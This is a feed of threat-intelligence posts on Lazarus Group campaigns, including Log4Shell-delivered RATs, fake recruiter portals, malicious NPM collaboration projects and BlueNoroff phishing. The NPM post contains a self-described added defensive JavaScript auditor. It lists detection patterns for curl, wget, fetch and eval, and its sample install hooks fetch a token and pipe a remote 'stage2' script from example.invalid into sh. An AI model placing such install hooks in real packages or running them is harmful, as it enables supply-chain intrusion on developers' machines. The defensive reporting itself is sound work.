lazarus - X-Industry - Red Sky Alliance (feed updated 2024-03-29T08:38:33Z): https://redskyalliance.org/xindustry/feed/tag/lazarus

Lazarus Group Still Deploys Remote Access Trojans
https://redskyalliance.org/xindustry/lazarus-group-still-deploys-remote-access-trojans
Published 2023-12-13T20:20:07.000Z by Mac McKee (https://redskyalliance.org/members/MacMcKee)
<div><p>The North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts. Investigators are tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based malware families: a RAT called NineRAT that leverages Telegram for command-and-control (C2), DLRAT, and a downloader dubbed BottomLoader.</p>
<p>The researchers described the adversary's latest tactics as a definitive shift and noted that they overlap with the cluster widely tracked as Andariel (aka Onyx Sleet or Silent Chollima), a sub-group within the Lazarus umbrella. Andariel is typically tasked with initial access, reconnaissance and establishing long-term access for espionage in support of the North Korean government's national interests. Attack chains involve the exploitation of CVE-2021-44228 (aka Log4Shell) against publicly accessible VMware Horizon servers to deliver NineRAT. Some of the prominent sectors targeted include manufacturing, agriculture, and physical security.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-hackers-have-new-rats">https://redskyalliance.org/xindustry/lazarus-hackers-have-new-rats</a></p>
<p>The abuse of Log4Shell is not surprising given that, according to Veracode, 2.8% of applications are still using vulnerable versions of the library (from 2.0-beta9 through 2.15.0) two years after public disclosure, with another 3.8% using Log4j 2.17.0, which, while not vulnerable to CVE-2021-44228, is susceptible to CVE-2021-44832.</p>
<p>NineRAT, first developed in May 2022, is said to have been put to use as early as March 2023 in an attack aimed at a South American agricultural organization, and then again in September 2023 against a European manufacturing entity. It uses Telegram, a legitimate messaging service, for C2 communications in order to evade detection. The malware acts as the primary means of interaction with the infected endpoint, enabling the attackers to send commands to gather system information, upload files of interest, download additional files, and even uninstall and upgrade itself.<a href="#_ftn2">[2]</a></p>
<p>"Once NineRAT is activated it accepts preliminary commands from the Telegram-based C2 channel, to again fingerprint the infected systems. Re-fingerprinting of infected systems indicates that the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase," the researchers noted.</p>
<p>Also used in the attacks after initial reconnaissance is a custom proxy tool called HazyLoad that was previously identified by Microsoft as used by the threat actor as part of intrusions weaponizing critical security flaws in JetBrains TeamCity (CVE-2023-42793, CVSS score: 9.8). HazyLoad is downloaded and executed by means of another malware called BottomLoader.</p>
<p>Operation Blacksmith has also been observed delivering DLRAT, which is both a downloader and a RAT equipped to perform system reconnaissance, deploy additional malware, and retrieve commands from the C2 and execute them on the compromised systems. DLRAT is another iteration in the Lazarus trend that started with MagicRAT: using exotic or uncommon languages and frameworks, along with modular malware, in order to avoid detection. The multiple tools providing overlapping backdoor entry give Lazarus Group redundancy in the event one tool is discovered, enabling highly persistent access, the researchers said.</p>
<p>The exploitation of Log4Shell by Andariel is not new, as the hacking crew has used the vulnerability as an initial access vector in the past to deliver a remote access trojan referred to as EarlyRat. The disclosure comes as the AhnLab Security Emergency Response Center (ASEC) detailed Kimsuky's use of AutoIt versions of malware such as Amadey and RftRAT, distributed via spear-phishing attacks bearing booby-trapped attachments and links in an attempt to bypass security products.</p>
<p>Kimsuky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is an element operating under North Korea's Reconnaissance General Bureau (RGB), which also houses the Lazarus Group. It was sanctioned by the US Treasury Department on 30 November 2023 for gathering intelligence to support the regime's strategic objectives. "After taking control of the infected system, to exfiltrate information, the Kimsuky group installs various malware such as keyloggers and tools for extracting accounts and cookies from web browsers," ASEC said in an analysis published recently.</p>
<p>It also follows the discovery of a new Konni-linked phishing campaign that uses a malicious executable file disguised as a Microsoft Word file to deliver a backdoor that "receives obfuscated commands from the threat actor and executes them in XML format."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, a demo or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com</p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings: <a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2023/12/lazarus-group-using-log4j-exploits-to.html">https://thehackernews.com/2023/12/lazarus-group-using-log4j-exploits-to.html</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/">https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/</a></p></div>

Looking for a Real IT Job?
https://redskyalliance.org/xindustry/looking-for-a-real-it-job
Published 2023-11-20T12:50:00.000Z by Bill Schenkelberg (https://redskyalliance.org/members/BillSchenkelberg)
<div><p>It is even more diabolical that cyber threat actors target job hunters, especially those who are out of work and running behind on their bills. Recently, a sub-set within the infamous Lazarus Group has established new infrastructure that impersonates skills assessment portals as part of its social engineering campaigns. Lazarus Group, also known by other names such as Guardians of Peace or Whois Team, is a hacker group made up of an unknown number of individuals and run by the government of North Korea. While not much is known about the Lazarus Group, Western researchers have attributed many cyberattacks to them between 2010 and 2021.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware">https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware</a></p>
<p>Researchers at Microsoft attributed the activity to a threat actor it calls Sapphire Sleet, describing it as a "shift in the persistent actor's tactics." Sapphire Sleet, also called APT38, BlueNoroff, CageyChameleon, and CryptoCore, has a track record of orchestrating cryptocurrency theft via social engineering. Recently, investigators linked the threat actor to a new macOS malware family called ObjCShellz, which is assessed to be a late-stage payload delivered in connection with another macOS malware known as RustBucket. "Sapphire Sleet typically finds targets on platforms like LinkedIn and uses lures related to skills assessment," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter). The threat actor then moves successful communications with targets to other platforms. A spokesman said past campaigns mounted by the hacking crew involved sending malicious attachments directly or embedding links to pages hosted on legitimate websites like GitHub.</p>
<p>The quick detection and deletion of these payloads may have forced Sapphire Sleet to build out its own network of websites for malware distribution. "Several malicious domains and subdomains host these websites, which entice recruiters to register for an account," the company added. "The websites are password-protected to impede analysis."</p>
<p>While LinkedIn may be a hub of the business world, the platform's profile validation and identity protection features are lackluster. Fake job listings are created each day, tricking unsuspecting users into sharing information and potentially spending thousands of dollars on technology that will be shipped (and stolen). Here is a step-by-step process of how scammers are leveraging LinkedIn: </p>
<ol>
<li>A Fake Job Listing is Created: LinkedIn allows any user, regardless of the age of the account or its previous activity, to post a job as any company. Anyone with an internet connection and an email address can sign up for a LinkedIn account and post a job from Microsoft, Google, or Facebook. LinkedIn's structure then links these entirely false job listings to the targeted company's official LinkedIn page, a security oversight that the company has been aware of for years but has taken no action to remedy.</li>
<li>Fake Profiles of Real Team Members are Created: The scammers then create false lookalike profiles on social media platforms and messaging services by downloading public profile pictures of the targeted company's team members, spoofing their job titles and personal descriptions to fool anyone that is not deeply familiar with the company.</li>
<li>Scammers Steal Applicant Data and Technology: Once the scammers have someone "hooked" with a fake job offer they either email the applicant or start a chat on an encrypted messaging platform like Wire, telling the applicant to purchase high-end electronics like smartphones, tablets, and laptops that they will then be reimbursed for. Before reimbursement, the applicant must send in their devices to be "preloaded with software." That's when all communication with fake representatives from the company will disappear, with these bad actors getting away with a collection of pricey technology and moving on to their next victim.</li>
</ol>
<p>Source: <a href="https://thehackernews.com/2023/11/microsoft-warns-of-fake-skills.html">https://thehackernews.com/2023/11/microsoft-warns-of-fake-skills.html</a></p>
</div>

Wanna Collab? Download this Malware
https://redskyalliance.org/xindustry/wanna-collab-download-this-malware
Published 2023-07-31T20:09:24.000Z by JD Thomason (https://redskyalliance.org/members/JDThomason)
<div><p>The Lazarus Group is a North Korean state-sponsored cybercrime group that has been credited, in one way or another, with a recent social engineering campaign targeting developers on GitHub. The group is said to have been created by the North Korean government as early as 2007 and is part of the RGB, North Korea’s primary foreign intelligence agency. “Lazarus Group” appears to be the primary identity of the group, but it has several aliases such as Appleworm, Group 77, Guardians of Peace, Hidden Cobra, and Jade Sleet, among others.</p>
<p>They target institutions in many areas, such as government, military, finance, manufacturing, and publishing, among many others. Their typical tactics include cyber espionage, data theft, heists, destructive malware, and, as we’ll see shortly, social engineering. They have been involved in a variety of malicious activities, such as the WannaCry 2.0 ransomware, which affected approximately 300,000 computers in at least 150 different countries, the 2014 attacks on Sony Pictures, and the theft of $81 million from Bangladesh Bank in 2016.</p>
<p>The social engineering campaign we’re focusing on here resembles another Lazarus campaign from January 2021, in which cybersecurity researchers were targeted for collaboration on vulnerability exploit research and the attackers took advantage of malicious Visual Studio projects. Social engineering can be thought of as the process of manipulating, influencing, or deceiving someone to obtain something like private information, restricted access, or valuables. Because they generally require some form of communication between attacker and victim, social engineering attacks are built around how people typically think and behave.</p>
<p>The goals of social engineering attacks will typically be either sabotage or theft. Common types of social engineering attacks found in the digital world can include things like phishing, baiting, physical breaches like tailgating, or scareware like a malicious antivirus ad giving a false report.</p>
<p>The attack cycle of a social engineering attack will generally have four stages. First is preparation, where information is gathered on an individual target or a target group. Next is infiltration, where communication is started and trust is built. Exploitation occurs when the target’s weaknesses and trust align in such a way that the attack can advance. Finally, the attacker disengages once all of the required actions have been taken by the target.</p>
<p>GitHub released a security alert detailing the specifics of this campaign and its attack chain on July 18th. The threat actors begin by impersonating either developers or recruiters, using accounts on GitHub and other social media sites. In some cases the accounts were fake, and in others the accounts were compromised. Fake accounts linked to this campaign have been found on LinkedIn, Slack, and Telegram.</p>
<p>Developers are being targeted in blockchain, cryptocurrency, online gambling, and cyber security. After contact has been established, targets are invited into collaboration projects, which contain malicious NPM package dependencies. These packages act as first-stage downloaders, which download and execute secondary malware. The projects themselves seem to mostly involve either media players or cryptocurrency trading tools.</p>
<p>The NPM usage pattern exhibited by this campaign was first discovered by Phylum research in June of 2023. They noted the sophistication of the technique, as the execution order of the packages used is crucial to the success of the infection. The attack is spread across a pair of ordered NPM packages: the first package fetches and stores a token from a remote server, which is then used by the second package to obtain malicious code from a remote server.</p>
<p>In terms of mitigation, we can begin by noting that GitHub has listed a few indicators like domain names, malicious NPM packages, and malicious NPM accounts on their blog. The link to the mitigation blog post is here:</p>
<p><a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/">https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/</a></p>
<p>Anyone who was solicited by known malicious accounts is likely a target of this campaign. Repository invites can be reviewed in the GitHub security log. The events to look for are action:repo.add_member events, which indicate that you have accepted an invite to a repository. Think twice before accepting solicitations to collaborate on or install projects with NPM dependencies. Extra scrutiny should be given to new or recently published NPM dependencies, and to scripts that make network connections during installation. Anyone affected by these projects should inform their employer's cybersecurity department, and it may also be prudent to reset or wipe affected devices, change account passwords, and rotate tokens stored on the affected devices.</p>
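<p>The two review steps just described, as an added example that is not part of the original article and is not GitHub's or Phylum's own tooling: a Node.js script that pulls repo.add_member events out of a security-log export and flags install-time NPM scripts that reach the network. The log field names (action, actor, repo, created_at), the sample log records and the sample package manifests are all constructed for this example.</p>

```javascript
// Added example (not from the article, GitHub or Phylum): two defender-side
// checks that follow the article's advice.
//   1. Pull repo.add_member events (accepted repository invites) out of a
//      GitHub security-log export.
//   2. Flag NPM lifecycle scripts that run at install time and reach the
//      network or evaluate fetched code.
// Field names in the sample log records and the sample package manifests
// are constructed for this example.

// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators of network access or remote-code evaluation inside an
// install script. Constructed list; extend it for your own environment.
const NETWORK_INDICATORS = [
  /\bcurl\b/i,
  /\bwget\b/i,
  /https?:\/\//i,
  /\bfetch\s*\(/i,
  /\bhttps?\.(get|request)\s*\(/i,
  /\bnode\s+-e\b/i,
  /Invoke-WebRequest/i,
  /\bpowershell\b/i,
  /\beval\s*\(/i,
];

// Return repo.add_member events from a parsed security-log export, newest
// first, so recently accepted invites are reviewed before older ones.
function findRepoInvites(entries) {
  return entries
    .filter((e) => e.action === "repo.add_member")
    .sort((a, b) => (a.created_at < b.created_at ? 1 : -1))
    .map((e) => ({ repo: e.repo, at: e.created_at, invitedBy: e.actor }));
}

// Inspect one package.json object and return a finding for each
// install-time script that matches at least one indicator.
function auditInstallScripts(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const indicators = NETWORK_INDICATORS.filter((re) => re.test(command)).map(String);
    if (indicators.length > 0) {
      findings.push({ package: pkg.name, version: pkg.version, hook, command, indicators });
    }
  }
  return findings;
}

// Audit every manifest in a dependency tree (package name -> package.json).
function auditDependencyTree(tree) {
  return Object.values(tree).flatMap(auditInstallScripts);
}

// Constructed sample security-log export (three records).
const SAMPLE_SECURITY_LOG = [
  { action: "user.login", actor: "me", created_at: "2023-07-10T09:00:00Z" },
  { action: "repo.add_member", actor: "recruiter-example", repo: "recruiter-example/media-player", created_at: "2023-07-12T14:20:00Z" },
  { action: "repo.add_member", actor: "colleague", repo: "myorg/internal-tool", created_at: "2023-06-01T08:00:00Z" },
];

// Constructed sample dependency tree: one benign package and a pair of
// packages whose install hooks contact a remote host, mirroring the ordered
// two-package pattern the article describes.
const SAMPLE_TREE = {
  "left-pad-example": { name: "left-pad-example", version: "1.0.0", scripts: { test: "node test.js" } },
  "player-helper-example": {
    name: "player-helper-example",
    version: "0.0.2",
    scripts: { preinstall: "node -e \"fetch('https://example.invalid/token').then(r => r.text()).then(t => require('fs').writeFileSync('.token', t))\"" },
  },
  "player-core-example": {
    name: "player-core-example",
    version: "0.0.3",
    scripts: { postinstall: "curl -s https://example.invalid/stage2 | sh" },
  },
};

console.log("Accepted repository invites:", JSON.stringify(findRepoInvites(SAMPLE_SECURITY_LOG), null, 2));
console.log("Suspicious install scripts:", JSON.stringify(auditDependencyTree(SAMPLE_TREE), null, 2));
```

<p>To run it against real data, replace the two constructed samples with the parsed JSON export of your security log and the package.json files found under node_modules.</p>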
<p>In summary, the Lazarus Group is a North Korean state-sponsored cybercrime group said to have been operating as early as 2007. They have several aliases, such as Jade Sleet and Guardians of Peace, and they operate against many sectors, including government, military, and finance.</p>
<p>Social engineering attacks aim to deceive someone in such a way that an attacker can obtain things like information or restricted access. Attacks like phishing or baiting are under the umbrella of social engineering, and a social engineering attack’s cycle will normally have four stages: preparation, infiltration, exploitation, and disengagement.</p>
<p>Developers on GitHub have been targeted in several different areas including blockchain, cryptocurrency, online gambling, and cyber security, for the purposes of collaborating on projects like media players or cryptocurrency trading tools. These can contain malicious NPM package dependencies, which act as first stage downloaders for additional malware.</p>
<p>Finally, we covered a few mitigation tips for this attack that were distributed by GitHub. They have a list of known malicious accounts listed on their blog, and anyone who has collaborated with these accounts is likely a target. Users can review their security logs on GitHub to see if they have been added to any suspicious projects. Users should also take extra care when examining the package dependencies and installation scripts of a project, particularly if newer NPM packages are involved.</p>
<p>[1]: <a href="https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/">https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/</a></p>
<p>[2]: <a href="https://home.treasury.gov/news/press-releases/sm774">https://home.treasury.gov/news/press-releases/sm774</a></p>
<p>[3]: <a href="https://ofac.treasury.gov/recent-actions/20190913">https://ofac.treasury.gov/recent-actions/20190913</a></p>
<p>[4]: <a href="https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and">https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and</a></p>
<p>[5]: <a href="https://usa.kaspersky.com/resource-center/definitions/what-is-social-engineering">https://usa.kaspersky.com/resource-center/definitions/what-is-social-engineering</a></p>
<p>[6]: <a href="https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html">https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</a></p>
<p>[7]: <a href="https://www.imperva.com/learn/application-security/social-engineering-attack/">https://www.imperva.com/learn/application-security/social-engineering-attack/</a></p>
<p>[8]: <a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#domains">https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#domains</a></p>
<p>[9]: <a href="https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/">https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/</a></p>
</div>

Lazarus Group has New Tricksters
https://redskyalliance.org/xindustry/lazarus-group-has-new-tricksters
Published 2022-12-31T14:10:00.000Z by Bill Schenkelberg (https://redskyalliance.org/members/BillSchenkelberg)
<div><p>North Korea’s BlueNoroff hackers have updated their strategies and delivery techniques in a new wave of attacks targeting banks and venture capital firms, according to cyber threat investigators. Part of Lazarus, a hacking group linked to the North Korean government, BlueNoroff is financially motivated and has been blamed for numerous cyber-attacks targeting banks, cryptocurrency firms, and other financial institutions.</p>
<p>The campaign by BlueNoroff has been in operation at least since 2017. It uses advanced phishing and social engineering techniques in order to abuse trust within companies. As such, threat actors study and analyze behaviors and interactions of employees to detect topics of interest.<a href="#_ftn1">[1]</a></p>
<p>After collecting the necessary data on the victims, they send what looks like a relevant and trustworthy email from one colleague to another, sharing a document or asking the recipient to review or answer questions about its contents. By including the logo of the third-party service SendGrid, which offers user-tracking capabilities, the attacker knows exactly when the victim opens the email.</p>
<p>Alternatively, after hacking into an existing company, threat actors use its pathways such as email and social media to contact other firms and distribute weaponized documents in the form of investment contracts and similar files. Malicious actors then exploit the CVE-2017-0199 vulnerability in Microsoft Word.</p>
<p>Following several months of silence, the group has resumed its activities this fall with renewed attacks that leverage new malware, and updated delivery techniques that include new file types and a method of bypassing Microsoft’s Mark-of-the-Web (MotW) protections. Specifically, the hackers are distributing optical disk image (.iso) and virtual hard disk (.vhd) files containing decoy Office documents, which allows them to avoid the MotW warning that Windows typically displays when a user attempts to open a document downloaded from the internet. Relying on phishing, BlueNoroff is attempting to infect target organizations to intercept cryptocurrency transfers and drain accounts.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-targeting-cryptocurrency">https://redskyalliance.org/xindustry/lazarus-targeting-cryptocurrency</a></p>
<p>As part of the new campaign, the hacking group has registered an estimated seventy (70) fake domains mimicking well-known banks and venture capital firms, with a focus on Japanese firms. Organizations in the UAE, the US, and Vietnam are also targeted. These domains have been used for phishing attacks aimed at startup employees. The group also ‘adopted new techniques to convey the final payload’, including the use of Visual Basic Script and Windows Batch scripts, and the introduction of a new downloader to fetch the next-stage payload.</p>
<p>In September 2022, a victim in the UAE was targeted with a malicious Office document designed to connect to a remote server and download a payload named ieinstal.exe, which helped bypass User Account Control (UAC) protections. After the infection, the threat actor used the backdoor to perform hands-on-keyboard activities such as fingerprinting and the installation of additional malware with high privileges.</p>
<p>In another attack, the group was observed using a downloader that checks the system for antivirus programs from Avast, Avira, Bitdefender, Kaspersky, Microsoft, Sophos, and Trend Micro in order to disable them. BlueNoroff was also observed abusing Living-off-the-Land binaries (LOLBins) and using various scripts to display a decoy document and fetch the next-stage payload, as well as using a new Windows executable downloader that creates a fake password file and downloads a payload.</p>
<p>As part of the campaign, the hackers also used fake domains for hosting malicious documents and payloads, and fake domains imitating legitimate financial and investment companies, most of which are Japanese organizations. Lately, the group also targeted cryptocurrency-related businesses. This threat actor has introduced slight modifications to deliver their malware. This also suggests that attacks by this group are unlikely to decrease in the near future.</p>
<p>Organizations are advised to train their employees on phishing, perform a network audit to identify vulnerabilities and weaknesses, and deploy and maintain security solutions that offer endpoint protection and threat detection and response capabilities.</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.securityweek.com/north-korean-hackers-created-70-fake-bank-venture-capital-firm-domains">https://www.securityweek.com/north-korean-hackers-created-70-fake-bank-venture-capital-firm-domains</a></p></div>

Updated LinkedIn Security Features Targeting Fraudulent Accounts
https://redskyalliance.org/xindustry/updated-linkedin-security-features-targeting-fraudulent-accounts
Published 2022-10-27T20:32:14.000Z by JD Thomason (https://redskyalliance.org/members/JDThomason)
<div><p>LinkedIn has become a popular destination for threat actors trying to communicate with people for a variety of purposes, such as distributing malware, cyberespionage, credential stealing, and financial fraud. One common approach cyber criminals take on LinkedIn is to contact people from a fake profile claiming to be a recruiter working at a technology, defense, or media company. The North Korean-sponsored group Lazarus has often engaged in these kinds of activities in order to propagate malware [1].</p>
<p>In an effort to mitigate some of these schemes, LinkedIn is beginning to implement a number of security features with the hope that utilizing fake profiles will be less effective for instigating attacks. A summary of the changes is that they will start displaying more information about profiles to users, actively seek out fake profiles with AI, and warn users about suspicious messages. In terms of how LinkedIn is showing more information to users, they are adding an “about this profile” feature to user profiles [2]. A glimpse of this can be seen below in Figure 1. This feature shows when a profile was first created, when it was last updated, and whether the user has verified a phone number and/or work email. This can be valuable information to have when deciding if you should consider communicating with others through LinkedIn.</p>
<p style="text-align:center;"><em>Figure 1. Showing the new “About this profile” section (source: LinkedIn)</em></p>
<p>In addition to the added information being shown about profiles, LinkedIn is also taking note of the remarkable improvements in AI-generated imagery and is developing deep learning models to detect such images. Setting aside the ethical and legal controversies currently surrounding AI imagery, using AI-generated images can make fake profiles appear more legitimate. LinkedIn’s new models will check profile photos for image artifacts associated with these types of images in an attempt to identify potentially fake profiles [2].</p>
<p>Another change that is taking place is the addition of warnings to LinkedIn messages. Specifically, users will now begin to see warnings if messages contain content that has been deemed high-risk [2]. For example, a user may see warnings in messages that appear to be trying to move the conversation to an external site. An example message can be seen below in Figure 2. There are certainly other “high-risk” aspects of nefarious messages that may receive warnings, but attempting to lure a user away from LinkedIn is worthy of note here because it is a common tactic in many attacks, especially since delivering files is often needed to execute an attack. In the Lazarus attack mentioned previously, threat actors would attempt to lure users into WhatsApp for malware delivery [1]. These changes also include the ability to report messages or mark them as safe.</p>
<p><a href="{{#staticFileLink}}10856608491,RESIZE_1200x{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10856608491,RESIZE_710x{{/staticFileLink}}" width="600" alt="10856608491?profile=RESIZE_710x" /></a></p>
<p style="text-align:center;"><em>Figure 2. LinkedIn message with warning (source: LinkedIn)</em></p>
<p>In summary, LinkedIn is looking to cut down fraudulent activity on its platform by implementing a few security updates. These updates are:</p>
<ul>
<li>A new “about this profile” feature, which allows users to see more information about a profile, such as when it was created and last updated.</li>
<li>Using deep learning models to identify potentially fake profiles through their profile images.</li>
<li>Implementing a warning system in LinkedIn messages so users can be more aware of potentially dangerous messages.</li>
</ul>
<p>Even with these updates, it is important for users to keep in mind a few warning signs that may indicate fraudulent activity. Users should consider reporting accounts that exhibit any of the following behavior [3]:</p>
<ul>
<li>Asking for money, cryptocurrency, or gift cards.</li>
<li>Posting jobs that seem too good to be true, or jobs that require upfront payments.</li>
<li>Sending messages with romantic gestures or bad grammar.</li>
<li>Profiles with abnormal profile images or incomplete work history.</li>
<li>Profiles with no connections in common.</li>
</ul>
<p><strong>[1]: <a href="https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/">https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/</a></strong></p>
<p><strong>[2]: <a href="https://blog.linkedin.com/2022/october/25/new-linkedin-profile-features-help-verify-identity--detect-and-r">https://blog.linkedin.com/2022/october/25/new-linkedin-profile-features-help-verify-identity--detect-and-r</a></strong></p>
<p><strong>[3]: <a href="https://blog.linkedin.com/2022/june/16/working-together-to-keep-linkedin-safe">https://blog.linkedin.com/2022/june/16/working-together-to-keep-linkedin-safe</a></strong></p>
<p><strong>About Red Sky Alliance</strong></p>
<p>Red Sky Alliance is in New Boston, NH USA. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/"><strong>https://www.redskyalliance.org/</strong></a></li>
<li>Website: <a href="https://www.wapacklabs.com/"><strong>https://www.wapacklabs.com/</strong></a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941"><strong>https://www.linkedin.com/company/64265941</strong></a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989"><strong>https://attendee.gotowebinar.com/register/5504229295967742989</strong></a></p></div>Weekly Cyber Intel Report - All Sector 10 21 2022https://redskyalliance.org/xindustry/weekly-cyber-intel-report-all-sector-10-21-20222022-10-21T12:15:00.000Z2022-10-21T12:15:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><span style="font-size:12pt;"><a href="{{#staticFileLink}}10846789675,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10846789675,RESIZE_400x{{/staticFileLink}}" width="250" alt="10846789675?profile=RESIZE_400x" /></a>Activity Summary - Week Ending on 21 October 2022:</span></h2>
<ul>
<li>Red Sky Alliance identified 32,517 connections from new IPs checking in with our Sinkholes</li>
<li>NoVa hit 17x</li>
<li>Analysts identified 1,515 new IP addresses participating in various Botnets</li>
<li>“Alchimist” Attack</li>
<li>REvil</li>
<li>Good News from Brazil</li>
<li>Khan Academy</li>
<li>Vinomofo</li>
<li>Japanese Crypto Funds</li>
<li>Oh Canada</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}10846789464,original{{/staticFileLink}}">IR-22-295-001_weekly295.pdf</a></p></div>NHS Under Constant Attackhttps://redskyalliance.org/xindustry/nhs-under-constant-attack2022-08-11T13:44:06.000Z2022-08-11T13:44:06.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}10761543869,RESIZE_930x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10761543869,RESIZE_400x{{/staticFileLink}}" width="250" alt="10761543869?profile=RESIZE_400x" /></a>There was once an unwritten moral code among cyber hackers that they would never attack vulnerable businesses like health care. Well, those disingenuous hacker ethics are out the door, and have been for a while. After dealing with the hack of the UK’s NHS-controlled ambulance service last week<a href="#_ftn1">[1]</a>, malicious hackers are now holding to ransom an IT firm that supplies NHS ‘trusts’, following a cyber-attack. NHS trusts are public sector bodies established by parliamentary order through the UK Secretary of State for Health to provide healthcare services to the NHS. They have a board of executive and non-executive directors and are accountable to the Secretary of State. Health administrators are concerned that criminals have access to confidential health records and could leak them if their demands are not met. The software company Advanced, which provides patient data systems to dozens of trusts and most NHS 111 providers in England, was hacked last week.</p>
<p>Call handlers across 85% of the UK are still without a crucial IT system and have had to resort to using pen and paper for the past week. Agencies including the National Crime Agency and GCHQ are now investigating the data breach. A reliable source said the attackers have made 'some demands', according to the Health Service Journal, although it is not entirely clear what they are. Some analysts believe the cyber criminals are looking for payments in exchange for not leaking information and for removing the malware.<a href="#_ftn2">[2]</a></p>
<p>Advanced's Adastra software, one of the systems that was attacked and is used by NHS 111, covers 40million patients, according to the company. Affected NHS 111 call handlers currently do not have access to the GP records or NHS numbers of people ringing the non-emergency service. They are also unable to make electronic bookings with GPs or send out ambulances for patients while the Adastra software is still offline. </p>
<p>The criminal hackers also attacked the company's Carenotes EPR software, which holds mental health records. Affected mental health trusts warned that staff are currently facing a 'pretty desperate' situation, still unable to access vital patient records. Mental health records and patients' unique NHS numbers are alleged to have been affected in the attack.</p>
<p>An Advanced spokesperson said: 'With respect to potentially impacted data, our investigation is under way. When we have more information about potential data access or exfiltration, we will update customers as appropriate.' One mental health trust chief executive, who preferred to stay anonymous, told the HSJ: 'It’s really difficult and the longer it goes on, the harder it gets for staff.'</p>
<p>Advanced said it will bring its NHS 111 and urgent care services back online 'within the next few days.' But it could take another month before Carenotes EPR is back online. Advanced said: 'We are working tirelessly to bring this timeline forward, and while we are hopeful to do so, we want our customers to be prepared. We will continue to provide updates as we make progress.'</p>
<p>Carenotes EPR is used by at least nine mental health trusts, and dozens of other trusts use different software from the company that is still offline.</p>
<p>An Advanced spokesperson said: 'We want to stress that there is nothing to suggest that our customers are at risk of malware spread and believe that early intervention from our Incident Response Team contained this issue to a small number of servers. Since our Health and Care systems were isolated at the end of last week, no further issues have been detected and our security monitoring continues to confirm that the incident is contained, allowing our recovery activities to move forward.'</p>
<p>The NHS attack was initially feared by experts to be from another country. Health chiefs told hospitals to shore up their system earlier this year amid fears of a Russian attack in retaliation to Western interference in the war in Ukraine. There have been widespread concerns about the technological resilience of the NHS which only last year stopped using fax machines. It was famously hacked in 2017 in the WannaCry attack, which brought the whole health service to a standstill for days and cost the UK £92million. </p>
